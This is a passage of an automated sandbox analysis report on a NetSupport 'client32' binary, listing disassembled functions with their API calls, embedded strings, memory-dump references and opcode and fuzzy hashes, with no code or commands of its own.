                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                  • API String ID: 2111968516-476189988
                                                                                  • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                  • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                  • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                  • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                  Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                  • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                  • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                  • DeleteObject.GDI32(?), ref: 1111F516
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteObject$PaletteSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2820294704-0
                                                                                  • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                  • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                  • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                  • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                  Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                    • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                    • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                    • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                  • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                  • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                  • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                  • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                  Strings
                                                                                  • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                  • Global\Client32Provider, xrefs: 1104F1BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                  • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                  • API String ID: 3682529815-1899068400
                                                                                  • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                  • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                  • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                  • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                  Function 110B3950 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                                  • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                  • String ID:
                                                                                  • API String ID: 4125181052-0
                                                                                  • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                  • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                                  • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                  • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                                  Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 11171312
                                                                                    • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                    • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                  • __getptd.LIBCMT ref: 11171329
                                                                                  • __amsg_exit.LIBCMT ref: 11171337
                                                                                  • __lock.LIBCMT ref: 11171347
                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                  • String ID:
                                                                                  • API String ID: 938513278-0
                                                                                  • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                  • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                  • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                  • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                  Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                    • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                    • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                    • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                    • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                    • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                    • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                    • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                    • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                    • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                  • std::exception::exception.LIBCMT ref: 11053483
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                  • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 2181554437-3415836059
                                                                                  • Opcode ID: a00efdcad8f2bad60e4870c7c17811d6641ded512b0e54363771028161f934e3
                                                                                  • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                  • Opcode Fuzzy Hash: a00efdcad8f2bad60e4870c7c17811d6641ded512b0e54363771028161f934e3
                                                                                  • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                  Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick
                                                                                  • String ID: General$TicklePeriod
                                                                                  • API String ID: 536389180-1546705386
                                                                                  • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                  • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                  • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                  • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                  Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                                  • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                                  • m_hWnd, xrefs: 110774FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2755825785-2830328467
                                                                                  • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                  • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                                  • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                  • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                                  Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 110D1378
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                  • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                  • API String ID: 1528188558-323366856
                                                                                  • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                  • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                  • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                  • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                  Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                    • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                    • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                    • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                    • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                                  • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                  • String ID: hhctrl.ocx
                                                                                  • API String ID: 1060647816-2298675154
                                                                                  • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
